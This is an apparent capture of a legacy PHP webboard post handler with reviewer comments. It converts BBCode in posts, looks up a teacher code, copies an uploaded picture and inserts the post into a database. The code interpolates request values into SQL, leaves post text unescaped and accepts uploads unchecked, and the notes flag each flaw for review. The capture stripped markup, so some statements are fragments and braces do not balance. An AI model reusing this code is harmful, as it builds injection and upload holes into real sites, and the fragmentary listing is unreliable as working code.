// Listing of post.php (8 KB per the viewer header), captured through a
// web-based file viewer: a webboard "post message" handler that converts
// BBCode-style tags in $QNote, looks up the teacher code, copies an uploaded
// picture and inserts the post into webboard_data.
//
// NOTE(review): the capture stripped everything that looked like markup: the
// opening PHP tag, the HTML inside string literals (hence the " " replacement
// strings below) and apparently whole statements. Braces therefore do not
// balance and some statements are only fragments; do not treat this text as
// the complete file.
// NOTE(review): $QNote, $QName, $QTitle, $Teacher_code, $QPic, $filename etc.
// are never assigned in the visible text. Presumably they arrive as request
// parameters (register_globals) or from the included files; confirm.
// NOTE(review): ereg*() and mysql_*() were deprecated in PHP 5.3 and removed
// in PHP 7; a port needs preg_*() and PDO or mysqli.
include("../include/FunctionDB.php");
include("../config.inc.php");
include("../function.php");
ConnectDB();
// NOTE(review): the text between the closing tag and the fragment below was
// lost. The fragment is the tail of a call taking $QNote; which function it
// was (possibly an escaping or newline-conversion step) cannot be told from here.
?>
" , $QNote ) ;

// Convert the designated bracket codes into the corresponding HTML tags.
// NOTE(review): no HTML escaping of $QNote is visible before these
// substitutions. If raw user text is stored and later echoed, it can carry
// arbitrary markup (stored XSS); escape with htmlspecialchars() first, then
// apply the tag conversion.
$QNote = eregi_replace ( "\[b\]", " " , $QNote ) ;
$QNote = eregi_replace ( "\[/b\]", " " , $QNote ) ;
$QNote = eregi_replace ( "\[i\]", " " , $QNote ) ;
$QNote = eregi_replace ( "\[/i\]", " " , $QNote ) ;
$QNote = eregi_replace ( "\[u\]", " " , $QNote ) ;
$QNote = eregi_replace ( "\[sup\]", " " , $QNote ) ;
$QNote = eregi_replace ( "\[/sup\]", " " , $QNote ) ;
$QNote = eregi_replace ( "\[sub\]", " " , $QNote ) ;
$QNote = eregi_replace ( "\[/sub\]", " " , $QNote ) ;
$QNote = eregi_replace ( "\[/u\]", " " , $QNote ) ;
$QNote = eregi_replace ( "\[\-\-\-\]", " " , $QNote ) ;
$QNote = eregi_replace ( "\[color=red\]", " " , $QNote ) ;
$QNote = eregi_replace ( "\[color=green\]", " " , $QNote ) ;
$QNote = eregi_replace ( "\[color=blue\]", " " , $QNote ) ;
$QNote = eregi_replace ( "\[color=orange\]", " " , $QNote ) ;
$QNote = eregi_replace ( "\[color=pink\]", " " , $QNote) ;
$QNote = eregi_replace ( "\[color=gray\]", " " , $QNote ) ;
$QNote = eregi_replace ( "\[/color\]", " " , $QNote ) ;
$QNote = eregi_replace ( "\[glow\]"," ", $QNote );

// Auto-link step: matches scheme://rest and user@host patterns in the text.
// NOTE(review): the replacement strings presumably wrapped the match in an
// anchor tag that the capture stripped. The URL pattern accepts any
// alphanumeric scheme before "://"; limiting linked schemes to http/https is
// the usual hardening. Confirm against the original file.
$QNote = eregi_replace("(^|[>[:space:]\n])([[:alnum:]]+)://([^[:space:]]*)([[:alnum:]#?/&=])([<[:space:]\n]|$)","\\2://\\3\\4", $QNote );
$QNote = eregi_replace("([[:alnum:]]+)@([^[:space:]]*)([[:alnum:]])([<[:space:]\n]|$)","\\1@\\2\\3", $QNote );

// Check whether the poster is a member.
//mysql_connect($host,$user,$passwd);
//mysql_query("SET NAMES 'tis620'");
// NOTE(review): $Teacher_code is interpolated directly into the statement and
// no escaping is visible in this listing. If it is request-controlled, this is
// SQL injection; escape it with mysql_real_escape_string() on this API, or use
// a PDO/mysqli prepared statement. The quoted literal also ends with a space
// before the closing quote.
$sql = "select Teacher_code from personal_tb WHERE Teacher_code='$Teacher_code ' ";
$result = mysql_db_query($dbname,$sql);
// $NRow and $row are not read again in the visible code.
$NRow = mysql_num_rows($result);
$row = mysql_fetch_array($result);

// Check whether the password is correct.
// NOTE(review): this check is commented out, so nothing visible here
// authenticates the poster or sets $Member before the insert below, unless an
// included file does. The disabled code compared $QPass to the stored value
// with ==, which suggests plaintext password storage; verify.
// if($QName==$row["User"] && $QPass==$row["Password"])
//{
// $Member = 1;
// if(!$QEmail)
// {
// $QEmail = $row["Email"];
// }
// }
// mysql_close();

// Save the picture.
// Rejects a post whose note and name are both empty, printing a
// "go back and edit" link (markup lost) and stopping.
if(($QNote =='')&&($QName==''))
{
    echo " ";
    echo "";
    echo "[ กลับไปแก้ไข ] ";
    echo "";
    echo " ";
    exit();
}
// NOTE(review): the opening of the upload branch (two unmatched closing
// braces follow) was lost in the capture, so any size or type check it held
// is not visible. As shown, the source is copied to "$path/$filename" with no
// visible is_uploaded_file() check, extension allow-list or filename
// sanitising. If $path is served by the web server, an uploaded script would
// be executable there. Use move_uploaded_file(), generate the stored name
// server-side, allow only image types and store outside the web root.
copy ($QPic , "$path/" . $filename );
}
}
else
{
    echo "
";
}

// Adjust the time to Thailand time in case the server is hosted abroad.
// NOTE(review): setlocale(LC_TIME, ...) changes locale-dependent formatting,
// not the time zone, and the format below is purely numeric, so this does not
// shift the clock by itself.
//$mdate = date("Y-m-d H:i:s");
setlocale (LC_TIME, $locale);
$mdate= strftime("%Y-%m-%d %H:%M:%S");
//$mdate= strftime("%Y-%m-%d %X");

// Write the data to the database.
mysql_connect($host,$user,$passwd);
// Switch the connection character set to TIS-620 (Thai).
mysql_query("SET NAMES 'tis620'");
// NOTE(review): every column value is interpolated into the statement with no
// visible escaping, including the free-text fields $QTitle, $QNote and
// $QName. This is the same injection exposure as the lookup above; bind the
// values through a prepared statement. $MsgBy, $Member and $IP are not
// assigned anywhere in the visible text.
$sql = "insert into webboard_data (Category,Teacher_code,Question,Note,Name,Namer,Member,IP,Email,Date,nphoto) values ('$Category','$Teacher_code','$QTitle','$QNote','$QName','$MsgBy','$Member','$IP','$QEmail','$mdate','$filename')";
$result1 = mysql_db_query($dbname,$sql);
// On failure only a generic message is shown; the database error is not
// logged anywhere in the visible code.
if(!$result1)
{
    echo "Error : Can not save to database";
    exit();
}
mysql_close();
?>